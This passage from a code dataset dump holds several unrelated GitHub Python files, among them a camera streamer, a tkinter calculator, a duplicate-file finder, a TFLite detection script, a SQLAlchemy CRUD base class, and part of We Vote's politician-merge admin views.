dict(title=title.decode('unicode_escape').encode('ascii','ignore'))\n\n session = dict(presentations=presentations)\n data[str(ii)] = session\n\n print(\"{} failures of {} total\".format(nfailures, ntotal))\n\nwith open(\"data/aas_abstracts.json\", \"w\") as f:\n dump = json.dumps(data)\n f.write(dump)\n\n\n","repo_name":"davidwhogg/AstroWorse","sub_path":"parse_pdftotext.py","file_name":"parse_pdftotext.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"71838707747","text":"import cv2\n\n\nclass Camera:\n\n def __init__(self, camera):\n self.vc = cv2.VideoCapture(camera)\n\n def open(self, width=640, height=480, fps=30):\n\n # self.vc.set(1, fps) #set FPS\n # self.vc.set(3, width) # set width\n # self.vc.set(4, height) # set height\n\n return self.vc.isOpened()\n\n def read(self, negative=False):\n if self.open():\n rval, frame = self.vc.read()\n if frame is not None:\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n if negative:\n frame = cv2.bitwise_not(frame)\n return frame\n\n # def read_gray(self, negative=False):\n # rval, frame = self.vc.read()\n # if frame is not None:\n # frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n # frame = cv2.cvtColor(frame, cv2.COLOR_GRAY2RGB)\n # if negative:\n # frame = cv2.bitwise_not(frame)\n # return frame\n\n def __next__(self):\n if self.open():\n while True:\n ret, frame = self.vc.read()\n if ret:\n ret, buffer = cv2.imencode(\".jpg\", frame)\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + buffer.tobytes() + b'\\r\\n')\n\n","repo_name":"gulyaeve/QCameraFLASK","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"44878267256","text":"import tkinter\nimport customtkinter\n\ncustomtkinter.set_appearance_mode(\"dark\") # Modes: system (default), light, dark\ncustomtkinter.set_default_color_theme(\"green\") # Themes: blue (default), dark-blue, green\n\nroot = customtkinter.CTk() # create CTk window like you do with the Tk window\nroot.title('Calculator')\nroot.geometry(\"500x310\")\n\nfor c in range(5): root.columnconfigure(index=c, weight=1)\nfor r in range(5): root.rowconfigure(index=r, weight=1)\n\n# create main entry and button\nfont_e = customtkinter.CTkFont(family=\"Helvetica\", size=30, weight='bold')\nfont_btn = customtkinter.CTkFont(family=\"Helvetica\", size=20, weight='bold')\nc_entry = customtkinter.CTkEntry(master=root, placeholder_text=\"\", font=font_e, justify=\"right\")\nc_entry.grid(row=0, column=0, columnspan=5, ipadx=6, ipady=6, padx=4, pady=4, sticky=\"nsew\")\n\nbtns = ['7',\"8\",\"9\",\"+\",\"-\",'4',\"5\",\"6\",\"*\",\"/\",'1',\"2\",\"3\",\"**\",\"** 0.5\",\"0\",\".\",\"C\",\"-/+\",\"=\"]\n\nb = 0\nfor r in range(5):\n if r == 0: continue\n for c in range(5):\n cmd = lambda x = btns[b]: calcul(x)\n btn = customtkinter.CTkButton(master=root, text=btns[b], font=font_btn, command=cmd)\n if btns[b]=='=':\n btn.configure(fg_color='#9a2fa5', hover_color='#671f6f')\n btn.grid(row=r, column=c, ipadx=6, ipady=6, padx=4, pady=4, sticky=\"nsew\")\n b += 1\n\n# the calculator\ndef calcul(x):\n if \"=\" in c_entry.get():\n c_entry.delete(0,\"end\")\n return\n\n if x == \"=\":\n try:\n result = eval(c_entry.get())\n c_entry.insert(\"end\",\"=\"+str(result))\n except:\n mw = customtkinter.CTkToplevel(root)\n mw.title('Error')\n mw.geometry(\"300x100\")\n customtkinter.CTkLabel(mw, text=\"Check the data...\").pack(side=\"top\", fill=\"both\", expand=True, padx=40, pady=40)\n return\n\n if x == \"C\":\n c_entry.delete(0, \"end\")\n return \n\n if x == \"-/+\":\n if c_entry.get()[0] == \"-\":\n c_entry.delete(0)\n else:\n c_entry.insert(0,\"-\")\n return\n\n c_entry.insert(\"end\", x)\n return\n\nif __name__ == '__main__':\n root.mainloop()","repo_name":"otolaa/Tkinter","sub_path":"customtkinter/custom_calculator.py","file_name":"custom_calculator.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"70"}
+{"seq_id":"20335836977","text":"import hashlib\nimport os\nimport sys\n\ndef file_sign(root, name):\n path = os.path.join(root, name)\n with open(path, 'r') as f:\n content = f.read()\n return [path, os.stat(path).st_size, hashlib.md5(content.encode()).hexdigest()]\n\n\n\nli = []\nfor root, dirs, files in os.walk(sys.argv[1], topdown=False):\n for name in files:\n li.append(file_sign(root, name))\nprint(\"---------------------------\")\ni = 0\nj = 0\nwz = 0\nwhile i < len(li):\n j = i + 1\n wz = 0\n while j < len(li):\n if (li[i][1] == li[j][1]) and (li[i][2] == li[j][2]) and (li[i][1] != -1):\n print(li[j][0])\n li[j][1] = -1\n wz = 1\n j += 1\n if wz == 1:\n print(li[i][0])\n li[i][1] = -1\n print(\"---------------------------\")\n i += 1\n","repo_name":"mateuszkochanek/Python-Course","sub_path":"lista2/zad4/zad4.py","file_name":"zad4.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"17066346497","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\n\nimport numpy as np\n\nfrom PIL import Image\n\nimport pprint as pp\n\n#import tensorflow as tf # TF2\nimport tflite_runtime.interpreter as tflite\n\ndef load_labels(filename):\n with open(filename, 'r') as f:\n return [line.strip() for line in f.readlines()]\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '-i',\n '--image',\n default='/tmp/test1.jpg',\n help='image to be classified')\n parser.add_argument(\n '-m',\n '--model_file',\n default='/tmp/detect.tflite',\n help='.tflite model to be executed')\n parser.add_argument(\n '-l',\n '--label_file',\n default='/tmp/labels.txt',\n help='name of file containing labels')\n parser.add_argument(\n '--input_mean',\n default=128, type=np.uint8,\n help='input_mean')\n parser.add_argument(\n '--input_std',\n default=128, type=np.uint8,\n help='input standard deviation')\n args = parser.parse_args()\n\n interpreter = tflite.Interpreter(model_path=args.model_file)\n interpreter.allocate_tensors()\n\n input_details = interpreter.get_input_details()\n output_details = interpreter.get_output_details()\n\n # print input and output details\n print(\"==Input Data==\")\n print(\"shape: \", input_details[0]['shape'])\n\n # check the type of the input tensor\n floating_model = input_details[0]['dtype'] == np.float32\n\n print(\"floating_model : \", floating_model)\n\n quant_model = input_details[0]['dtype'] == np.uint8\n\n print(\"quant_model : \", quant_model)\n\n # NxHxWxC, H:1, W:2\n height = input_details[0]['shape'][1]\n width = input_details[0]['shape'][2]\n img = Image.open(args.image).resize((width, height))\n\n # add N dim\n input_data = np.expand_dims(img, axis=0)\n\n if floating_model:\n input_data = (np.float32(input_data) - args.input_mean) / args.input_std\n\n interpreter.set_tensor(input_details[0]['index'], input_data)\n\n interpreter.invoke()\n\n output_data = interpreter.get_tensor(output_details[0]['index'])\n results = np.squeeze(output_data)\n\n top_k = results.argsort()[-5:][::-1]\n labels = load_labels(args.label_file)\n print(\"labels :\", labels)\n\n #for i in top_k:\n # if floating_model:\n # # print('{:08.6f}: {}'.format(float(results[i]), labels[i]))\n # print('this is the floating model results section')\n # else:\n # # print('{:08.6f}: {}'.format(float(results[i] / 255.0), labels[i]))\n # # print('{:08.6f}: {}'.format(float(results[i]/255.0), labels[i]))\n # print(results[i])\n # print(labels[1])\n # print(\"i :\", i)\n print(\"input details\")\n print(input_details)\n print()\n print(\"output details\")\n pp.pprint(output_details)\n print()\n\n print(output_data.shape)\n print()\n print(output_data)\n\n detection_boxes = interpreter.get_tensor(output_details[0]['index'])\n detection_classes = interpreter.get_tensor(output_details[1]['index'])\n detection_scores = interpreter.get_tensor(output_details[2]['index'])\n num_boxes = interpreter.get_tensor(output_details[3]['index'])\n\n num = int(interpreter.get_tensor(output_details[3]['index'])[0])\n\n print('detection_boxes')\n print('detection boxes: ', detection_boxes)\n\n print('detection_classes')\n print('detection_classes ', detection_classes)\n\n print('detection_scores')\n print('detection_scores ', detection_scores)\n\n print('num_boxes')\n print(\"number of boxes: \", num_boxes)\n\n if(num > 0):\n print('num: ', num)\n print('classes :', detection_classes[0])\n print('scores :', detection_scores[0])\n #for i in range(int(num_boxes[0])):\n # if detection_scores[0,i] > .5:\n # label_id = detection_classes[0,i]\n # print('label_id : ', label_id)\n\n # References: 1) https://github.com/tensorflow/tensorflow/issues/34761\n # 2) https://stackoverflow.com/questions/59143641/how-to-get-useful-data-from-tflite-object-detection-python\n # The TFLite_Detection_PostProcess custom op node has four outputs\n # detection_boxes: a tensor of shape [1, num_boxes, 4] with normalized coordinates\n # detection_classes: a tensor of shape [1, num_boxes] containing class prediction for each box\n # detection_scores: a tensor of shape [1, num_boxes]\n # num_boxes: a tensor of size 1 containing the number of detected boxes\n\n\n","repo_name":"mmmwembe/cards-training","sub_path":"label_image.py","file_name":"label_image.py","file_ext":"py","file_size_in_byte":4334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"1280006104","text":"class Solution:\n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n \n # 1. heap\n if not lists: return None\n heap = []\n count = 0\n for i, item in enumerate(lists):\n if item: \n count += 1\n heapq.heappush(heap, (item.val, count, item))\n head = head_temp = ListNode(0)\n while len(heap) > 0:\n value, _, node = heapq.heappop(heap)\n head_temp.next = node\n head_temp = head_temp.next\n node = node.next\n if node:\n count += 1\n heapq.heappush(heap, (node.val, count, node))\n return head.next\n \n # merge\n \n def merge_two(l1, l2):\n head = curr = ListNode(0)\n while l1 and l2:\n if l1.val <= l2.val:\n curr.next = l1\n l1 = l1.next\n curr = curr.next\n else:\n curr.next = l2\n l2 = l2.next\n curr = curr.next\n if not l1:\n curr.next = l2\n if not l2: \n curr.next = l1\n return head.next\n n = len(lists)\n if n == 0: return None\n interval = 1\n while interval < n:\n for i in range(0, n - interval, interval * 2):\n lists[i] = merge_two(lists[i], lists[i+interval])\n interval *= 2\n return lists[0] \n","repo_name":"ylt5b/leetcode","sub_path":"23. Merge k Sorted Lists.py","file_name":"23. Merge k Sorted Lists.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"24550967370","text":"# -*- coding: utf-8 -*- \n# @Time : 2022/5/3 08:57 \n# @Author : junjie\n# @File : __init__.py\n# 本页代码\"借鉴\"pity\n# pity github: https://github.com/wuranxu/pity\n\n\n\nfrom app.models.base import FunBaseModel\nfrom typing import Type, Union\nfrom loguru import logger\nfrom app.commons.exceptions.global_exception import BusinessException\nfrom app.commons.requests.request_model import BaseBody\nfrom app.commons.responses.response_model import BaseDto\nfrom datetime import datetime\nfrom functools import wraps\nfrom enum import Enum\nfrom app.models import Session\nfrom app.const.enums import DeleteEnum\n\n\n\ndef connect(func):\n \"\"\"\n 自动创建session装饰器\n \"\"\"\n @wraps(func)\n def wrapper(cls, *args, **kwargs):\n try:\n session = kwargs.pop(\"session\", None)\n if session is not None:\n return func(cls, session = session, *args, **kwargs)\n with Session() as ss:\n return func(cls, session = ss, *args, **kwargs)\n except Exception as e:\n import traceback\n logger.exception(traceback.format_exc())\n logger.error(f\"操作{cls.model.__name__}失败, args:{[*args]}, kwargs:{kwargs}, {func.__name__}方法报错: {e}\")\n raise BusinessException(f\"操作数据库失败: {e}\")\n return wrapper\n\n# 只支持单表\nclass BaseCrud(object):\n\n model: Type[FunBaseModel] = None\n\n\n @classmethod\n @connect\n def get_with_params(cls, session: Session, filter_list: list = None,\n _sort: list = None, _fields: Type[BaseDto] = None, _group: list = None, **kwargs):\n \"\"\"\n 查询数据\n :param session: 会话\n :param filter_list: 过滤条件,比较特殊的,or_(xxx == xxx)\n :param _sort: 排序字段\n :param kwargs: 不定传参,xx = xx\n :param _fields: Dto 过滤查询\n :param _group: 分组\n :return: 查询对象\n \"\"\"\n query_obj = cls.query_wrapper(session, filter_list, _sort, _fields, _group, **kwargs)\n return query_obj.all()\n\n\n @classmethod\n def query_wrapper(cls, session: Session, filter_list: list = None,\n _sort: list = None, _fields: Type[BaseDto] = None, _group: list = None, **kwargs):\n \"\"\"\n 查询数据\n :param session: 会话\n :param filter_list: 过滤条件,比较特殊的,or_(xxx == xxx)\n :param _sort: 排序字段,[xxx.xxx]\n :param kwargs: 不定传参,xx = xx\n :param _fields: Dto 过滤查询\n :param _group: 分组\n :return: 查询语句\n \"\"\"\n _filter_list = cls.__filter_k_v(filter_list, **kwargs)\n if _fields:\n field_list = []\n for field in _fields.__fields__.keys():\n field_list.append(getattr(cls.model, field))\n query_obj = session.query(*field_list).filter(*_filter_list)\n else:\n query_obj = session.query(cls.model).filter(*_filter_list)\n if _group:\n query_obj = query_obj.group_by(*_group)\n # 有排序字段时,进行排序\n return query_obj.order_by(*_sort) if _sort else query_obj\n\n @classmethod\n def __filter_k_v(cls, filter_list: list = None, not_del: bool = False, **kwargs):\n \"\"\"\n 查询主逻辑\n :param filter_list: 过滤条件,比较特殊的,or_(xxx == xxx)\n :param kwargs: 不定传参,xx = xx\n :param not_del: nol_del = True时,不过滤删除数据\n :return: filter_list\n \"\"\"\n filter_list = filter_list if filter_list else list()\n # 判断表是否有del_flag字段\n if getattr(cls.model, 'del_flag', None) and not not_del:\n # 只取未删除的数据\n filter_list.append(getattr(cls.model, 'del_flag') == DeleteEnum.no.value)\n for k, v in kwargs.items():\n # 过滤None的字段值,注意 0 和 False\n if v is None:\n continue\n elif isinstance(v, (bool, int)):\n filter_list.append(getattr(cls.model, k) == v)\n else:\n # 判断是否模糊查询,必须字符串,字符串开头%或者结尾%\n like = isinstance(v, str) and (v.startswith(\"%\") or v.endswith(\"%\"))\n if like and v != '%%':\n filter_list.append(getattr(cls.model, k).like(v))\n else:\n filter_list.append(getattr(cls.model, k) == v)\n return filter_list\n\n\n\n @classmethod\n @connect\n def get_with_pagination(cls, session: Session, page: int = 1, limit: int = 10, **kwargs):\n \"\"\"\n 分页查询\n :param session: 会话\n :param page: 页码\n :param limit: 大小\n :param kwargs: 不定传参\n :return: 总数,查询对象\n \"\"\"\n query_obj = cls.query_wrapper(session, **kwargs)\n total = query_obj.count()\n return total, query_obj.limit(limit).offset((page - 1) * limit).all()\n\n @classmethod\n @connect\n def get_with_existed(cls, session: Session, filter_list: list = None, **kwargs):\n \"\"\"\n 判断数据是否存在\n :param session: 会话\n :param filter_list: 过滤条件,比较特殊的,or_(xxx == xxx)\n :param kwargs: 不定传参\n :return:\n \"\"\"\n _filter_list = cls.__filter_k_v(filter_list, **kwargs)\n query = session.query(cls.model).filter(*_filter_list)\n # 获取结果,ant为true或者false\n ant = session.query(query.exists()).scalar()\n return ant\n\n @classmethod\n @connect\n def get_with_first(cls, session: Session, **kwargs):\n \"\"\"\n 获取第一条数据\n :param session: 会话\n :param kwargs: 不定传参\n :return:\n \"\"\"\n sql_obj = cls.query_wrapper(session, **kwargs)\n return sql_obj.first()\n\n\n @classmethod\n @connect\n def get_with_id(cls, session: Session, id: int):\n \"\"\"\n 根据主键id查询数据\n :param session: 会话\n :param id: 主键id\n :return:\n \"\"\"\n sql_obj = cls.query_wrapper(session, id=id)\n return sql_obj.first()\n\n @classmethod\n @connect\n def update_by_id(cls, session: Session, model: Union[dict, BaseBody], user: dict=None, not_null = False, **kwargs):\n \"\"\"\n 通过主键id更新数据\n :param session: 会话\n :param model: 更新模型\n :param user: 更新用户数据\n :param not_null: not_null=True 只有非空字段才更新数据\n :return:\n \"\"\"\n if isinstance(model, dict):\n id = model['id']\n model_dict = model\n else:\n id = model.id\n model_dict = vars(model)\n query = cls.query_wrapper(session, id=id, **kwargs)\n query_obj = query.first()\n if query_obj is None:\n raise BusinessException(\"数据不存在\")\n for var, value in model_dict.items():\n # 如果value是枚举值,得���过xxx.value获取值\n if isinstance(value, Enum): value = value.value\n if not_null:\n # 过滤None的字段值,注意 0 和 False\n if value is None:\n continue\n if isinstance(value, (bool, int)) or value:\n setattr(query_obj, var, value)\n else:\n setattr(query_obj, var, value)\n if user:\n setattr(query_obj, 'update_id', user['id'])\n setattr(query_obj, 'update_name', user['username'])\n session.commit()\n session.refresh(query_obj)\n return query_obj\n\n @classmethod\n @connect\n def update_by_map(cls, session: Session, filter_list: list, user: dict=None, **kwargs):\n \"\"\"\n 批量更新数据\n :param session: 会话\n :param filter_list: 过滤条件\n :param user: 更新人\n :param kwargs: 要更新的数据,k = v\n :return:\n \"\"\"\n # https://docs.sqlalchemy.org/en/14/errors.html#error-bhk3\n if getattr(cls.model, 'update_id') and getattr(cls.model, 'update_name') and user:\n kwargs['update_id'] = user['id']\n kwargs['update_name'] = user['username']\n query_obj = session.query(cls.model).filter(*filter_list)\n query_obj.update(kwargs)\n session.commit()\n return query_obj.all()\n\n\n @classmethod\n @connect\n def insert_by_model(cls, session: Session, model_obj: FunBaseModel):\n \"\"\"\n :param session: 会话\n :param model_obj: 实例化的表\n :return:\n \"\"\"\n session.add(model_obj)\n session.commit()\n session.refresh(model_obj)\n return model_obj\n\n @classmethod\n @connect\n def delete_by_id(cls, session: Session, id: int, user: dict = None, **kwargs):\n \"\"\"\n 通过主键id删除数据\n :param session: 会话\n :param id: 主键id\n :param user: 操作人\n :return:\n \"\"\"\n query = cls.query_wrapper(session, id=id, **kwargs)\n query_obj = query.first()\n if query_obj is None:\n raise BusinessException(\"数据不存在\")\n setattr(query_obj, 'del_flag', DeleteEnum.yes.value)\n setattr(query_obj, 'update_time', datetime.now())\n if user:\n setattr(query_obj, 'update_id', user['id'])\n setattr(query_obj, 'update_name', user['username'])\n session.commit()\n # session.refresh(query_obj)\n return query_obj\n\n @classmethod\n @connect\n def get_with_count(cls, session: Session, **kwargs):\n \"\"\"\n 统计数据\n :param session: 会话\n :param kwargs:\n :return:\n \"\"\"\n query = cls.query_wrapper(session, **kwargs)\n return query.group_by(cls.model.id).count() if getattr(cls.model, 'id', None) else query.count()","repo_name":"JokerChat/FunDataFactory","sub_path":"app/crud/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9966,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"70"}
+{"seq_id":"5636210851","text":"from pyconnector import connect_to_database\r\nfrom select_data import select\r\nfrom insert_data import insert\r\nfrom update_data import update\r\nfrom delt_data import delete\r\n\r\nmydb = connect_to_database()\r\n\r\ninsert_choose = input(\"--------What do you want to do?? Pls choose------- \\n 1.Insert\\n 2.Update\\n 3.Select\\n 4.Delete\\n Input here : \")\r\nif insert_choose.lower() == \"insert\":\r\n insert()\r\nelif insert_choose.lower() == \"update\":\r\n update()\r\nelif insert_choose.lower() == \"select\":\r\n select()\r\nelif insert_choose.lower() == \"delete\":\r\n delete() \r\nelse:\r\n print (\"Iced Americano\")\r\n\r\n \r\n","repo_name":"SiriMix19/PY","sub_path":"PY/NewSQL/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"14020620742","text":"# politician/views_admin.py\n# Brought to you by We Vote. Be good.\n# -*- coding: UTF-8 -*-\nimport re\nfrom base64 import b64encode\nimport json\nimport string\nfrom datetime import datetime, timedelta\nimport pytz\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.messages import get_messages\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db.models import F, Q\nfrom django.db.models.functions import Length\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.utils.timezone import localtime, now\nfrom django.urls import reverse\nimport wevote_functions.admin\nfrom admin_tools.views import redirect_to_sign_in_page\nfrom campaign.models import CampaignXManager\nfrom candidate.controllers import retrieve_candidate_photos\nfrom candidate.models import CandidateCampaign, CandidateListManager, CandidateManager, PROFILE_IMAGE_TYPE_FACEBOOK, \\\n PROFILE_IMAGE_TYPE_TWITTER, PROFILE_IMAGE_TYPE_UNKNOWN, \\\n PROFILE_IMAGE_TYPE_UPLOADED, PROFILE_IMAGE_TYPE_VOTE_USA\nfrom config.base import get_environment_variable\nfrom election.models import Election\nfrom exception.models import handle_record_found_more_than_one_exception, \\\n handle_record_not_found_exception, handle_record_not_saved_exception, print_to_log\nfrom image.controllers import create_resized_images\nfrom import_export_vote_smart.models import VoteSmartRatingOneCandidate\nfrom import_export_vote_smart.votesmart_local import VotesmartApiError\nfrom office.models import ContestOffice\nfrom politician.controllers import generate_campaignx_for_politician, politician_save_photo_from_file_reader, \\\n update_politician_details_from_candidate\nfrom position.models import PositionEntered, PositionListManager\nfrom representative.models import Representative, RepresentativeManager\nfrom voter.models import voter_has_authority\nfrom wevote_functions.functions import convert_date_to_we_vote_date_string, convert_to_int, \\\n convert_to_political_party_constant, convert_we_vote_date_string_to_date_as_integer, \\\n extract_first_name_from_full_name, extract_instagram_handle_from_text_string, \\\n extract_middle_name_from_full_name, \\\n extract_last_name_from_full_name, extract_twitter_handle_from_text_string, \\\n positive_value_exists, STATE_CODE_MAP, display_full_name_with_correct_capitalization\nfrom wevote_settings.constants import IS_BATTLEGROUND_YEARS_AVAILABLE\nfrom .controllers import add_alternate_names_to_next_spot, add_twitter_handle_to_next_politician_spot, \\\n fetch_duplicate_politician_count, figure_out_politician_conflict_values, find_duplicate_politician, \\\n merge_if_duplicate_politicians, merge_these_two_politicians, politicians_import_from_master_server\nfrom .models import Politician, PoliticianManager, POLITICIAN_UNIQUE_ATTRIBUTES_TO_BE_CLEARED, \\\n POLITICIAN_UNIQUE_IDENTIFIERS, PoliticiansArePossibleDuplicates, POLITICAL_DATA_MANAGER, UNKNOWN\n\nPOLITICIANS_SYNC_URL = get_environment_variable(\"POLITICIANS_SYNC_URL\") # politiciansSyncOut\nWE_VOTE_SERVER_ROOT_URL = get_environment_variable(\"WE_VOTE_SERVER_ROOT_URL\")\nWEB_APP_ROOT_URL = get_environment_variable(\"WEB_APP_ROOT_URL\")\n\nlogger = wevote_functions.admin.get_logger(__name__)\n\n\n@login_required\ndef compare_two_politicians_for_merge_view(request):\n status = ''\n # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n authority_required = {'political_data_manager'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n politician1_we_vote_id = request.GET.get('politician1_we_vote_id', 0)\n politician2_we_vote_id = request.GET.get('politician2_we_vote_id', 0)\n google_civic_election_id = request.GET.get('google_civic_election_id', 0)\n google_civic_election_id = convert_to_int(google_civic_election_id)\n state_code = request.GET.get('state_code', '')\n\n politician_manager = PoliticianManager()\n politician_results = politician_manager.retrieve_politician(\n politician_we_vote_id=politician1_we_vote_id,\n read_only=True)\n if not politician_results['politician_found']:\n messages.add_message(request, messages.ERROR, \"Politician1 not found.\")\n return HttpResponseRedirect(\n reverse('politician:politician_list', args=()) +\n \"?google_civic_election_id=\" + str(google_civic_election_id) +\n \"&state_code=\" + str(state_code))\n\n politician_option1_for_template = politician_results['politician']\n\n politician_results = politician_manager.retrieve_politician(\n politician_we_vote_id=politician2_we_vote_id,\n read_only=True)\n if not politician_results['politician_found']:\n messages.add_message(request, messages.ERROR, \"Politician2 not found.\")\n return HttpResponseRedirect(\n reverse('politician:politician_edit', args=(politician_option1_for_template.id,)) +\n \"?google_civic_election_id=\" + str(google_civic_election_id) +\n \"&state_code=\" + str(state_code))\n\n politician_option2_for_template = politician_results['politician']\n\n if politician1_we_vote_id == politician2_we_vote_id:\n messages.add_message(request, messages.ERROR, \"These politicians are already merged.\")\n return HttpResponseRedirect(\n reverse('politician:politician_edit', args=(politician_option1_for_template.id,)) +\n \"?google_civic_election_id=\" + str(google_civic_election_id) +\n \"&state_code=\" + str(state_code))\n\n conflict_results = figure_out_politician_conflict_values(\n politician_option1_for_template, politician_option2_for_template)\n politician_merge_conflict_values = conflict_results['politician_merge_conflict_values']\n if not conflict_results['success']:\n status += conflict_results['status']\n messages.add_message(request, messages.ERROR, status)\n\n # This view function takes us to displaying a template\n remove_duplicate_process = False # Do not try to find another office to merge after finishing\n return render_politician_merge_form(\n request,\n politician_option1_for_template,\n politician_option2_for_template,\n politician_merge_conflict_values,\n remove_duplicate_process)\n\n\n@login_required\ndef find_and_merge_duplicate_politicians_view(request):\n # admin, analytics_admin, partner_organization, political_data_manager, political_data_viewer, verified_volunteer\n authority_required = {'verified_volunteer'}\n if not voter_has_authority(request, authority_required):\n return redirect_to_sign_in_page(request, authority_required)\n\n find_number_of_duplicates = request.GET.get('find_number_of_duplicates', 0)\n state_code = request.GET.get('state_code', \"\")\n politician_manager = PoliticianManager()\n\n queryset = PoliticiansArePossibleDuplicates.objects.using('readonly').all()\n if positive_value_exists(state_code):\n queryset = queryset.filter(state_code__iexact=state_code)\n queryset_politician1 = queryset.values_list('politician1_we_vote_id', flat=True).distinct()\n exclude_politician1_we_vote_id_list = list(queryset_politician1)\n queryset_politician2 = queryset.values_list('politician2_we_vote_id', flat=True).distinct()\n exclude_politician2_we_vote_id_list = list(queryset_politician2)\n exclude_politician_we_vote_id_list = \\\n list(set(exclude_politician1_we_vote_id_list + exclude_politician2_we_vote_id_list))\n\n politician_query = Politician.objects.using('readonly').all()\n politician_query = politician_query.exclude(we_vote_id__in=exclude_politician_we_vote_id_list)\n if positive_value_exists(state_code):\n politician_query = politician_query.filter(state_code__iexact=state_code)\n politician_list = list(politician_query)\n\n # Loop through all the politicians to see how many have possible duplicates\n if positive_value_exists(find_number_of_duplicates):\n ignore_politician_id_list = []\n duplicate_politician_count = 0\n for we_vote_politician in politician_list:\n # Note that we don't reset the ignore_politician_list, so we don't search for a duplicate both directions\n ignore_politician_id_list.append(we_vote_politician.we_vote_id)\n duplicate_politician_count_temp = fetch_duplicate_politician_count(\n we_vote_politician, ignore_politician_id_list)\n duplicate_politician_count += duplicate_politician_count_temp\n\n if positive_value_exists(duplicate_politician_count):\n messages.add_message(request, messages.INFO,\n \"There are approximately {duplicate_politician_count} \"\n \"possible duplicates.\"\n \"\".format(duplicate_politician_count=duplicate_politician_count))\n\n # Loop through all the politicians in this election\n for we_vote_politician in politician_list:\n if we_vote_politician.we_vote_id in exclude_politician_we_vote_id_list:\n continue\n # Start ignore list with all the politicians already reviewed\n ignore_politician_id_list = exclude_politician_we_vote_id_list\n # Add current politician entry to ignore list\n ignore_politician_id_list.append(we_vote_politician.we_vote_id)\n # Now check to for other politicians we have labeled as \"not a duplicate\"\n not_a_duplicate_list = politician_manager.fetch_politicians_are_not_duplicates_list_we_vote_ids(\n we_vote_politician.we_vote_id)\n\n ignore_politician_id_list += not_a_duplicate_list\n\n results = find_duplicate_politician(we_vote_politician, ignore_politician_id_list)\n\n # If we find politicians to merge, stop and ask for confirmation\n if results['politician_merge_possibility_found']:\n politician_option1_for_template = we_vote_politician\n politician_option2_for_template = results['politician_merge_possibility']\n\n # Can we automatically merge these politicians?\n merge_results = merge_if_duplicate_politicians(\n politician_option1_for_template,\n politician_option2_for_template,\n results['politician_merge_conflict_values'])\n\n if merge_results['politicians_merged']:\n politician = merge_results['politician']\n if politician.we_vote_id not in exclude_politician_we_vote_id_list:\n exclude_politician_we_vote_id_list.append(politician.we_vote_id)\n if we_vote_politician.we_vote_id not in exclude_politician_we_vote_id_list:\n exclude_politician_we_vote_id_list.append(we_vote_politician.we_vote_id)\n PoliticiansArePossibleDuplicates.objects.create(\n politician1_we_vote_id=politician.we_vote_id,\n politician2_we_vote_id=None,\n state_code=state_code,\n )\n PoliticiansArePossibleDuplicates.objects.create(\n politician1_we_vote_id=we_vote_politician.we_vote_id,\n politician2_we_vote_id=None,\n state_code=state_code,\n )\n messages.add_message(request, messages.INFO, \"Politician {politician_name} automatically merged.\"\n \"\".format(politician_name=politician.politician_name))\n # No need to start over\n # return HttpResponseRedirect(reverse('politician:find_and_merge_duplicate_politicians', args=()) +\n # \"?state_code=\" + str(state_code))\n else:\n # Add an entry showing that this is a possible match\n PoliticiansArePossibleDuplicates.objects.create(\n politician1_we_vote_id=we_vote_politician.we_vote_id,\n politician2_we_vote_id=politician_option2_for_template.we_vote_id,\n state_code=state_code,\n )\n if politician_option2_for_template.we_vote_id not in exclude_politician_we_vote_id_list:\n exclude_politician_we_vote_id_list.append(politician_option2_for_template.we_vote_id)\n else:\n # No matches found\n PoliticiansArePossibleDuplicates.objects.create(\n politician1_we_vote_id=we_vote_politician.we_vote_id,\n politician2_we_vote_id=None,\n state_code=state_code,\n )\n\n return HttpResponseRedirect(reverse('politician:duplicates_list', args=()) +\n \"?state_code={state_code}\"\n \"\".format(state_code=state_code))\n\n\ndef render_politician_merge_form(\n request,\n politician_option1_for_template,\n politician_option2_for_template,\n politician_merge_conflict_values,\n remove_duplicate_process=True):\n candidate_list_manager = CandidateListManager()\n\n state_code = ''\n if hasattr(politician_option1_for_template, 'state_code'):\n state_code = politician_option1_for_template.state_code\n if hasattr(politician_option2_for_template, 'state_code'):\n state_code = politician_option2_for_template.state_code\n\n # Get info about candidates linked to each politician\n politician1_linked_candidates_count = 0\n politician1_linked_candidate_district_names = ''\n politician1_linked_candidate_names = ''\n politician1_linked_candidate_offices = ''\n politician1_linked_candidate_photos = []\n politician1_candidate_results = candidate_list_manager.retrieve_candidates_from_politician(\n politician_id=politician_option1_for_template.id,\n politician_we_vote_id=politician_option1_for_template.we_vote_id,\n read_only=True)\n if politician1_candidate_results['candidate_list_found']:\n is_first = True\n is_first_office = True\n for one_candidate in politician1_candidate_results['candidate_list']:\n 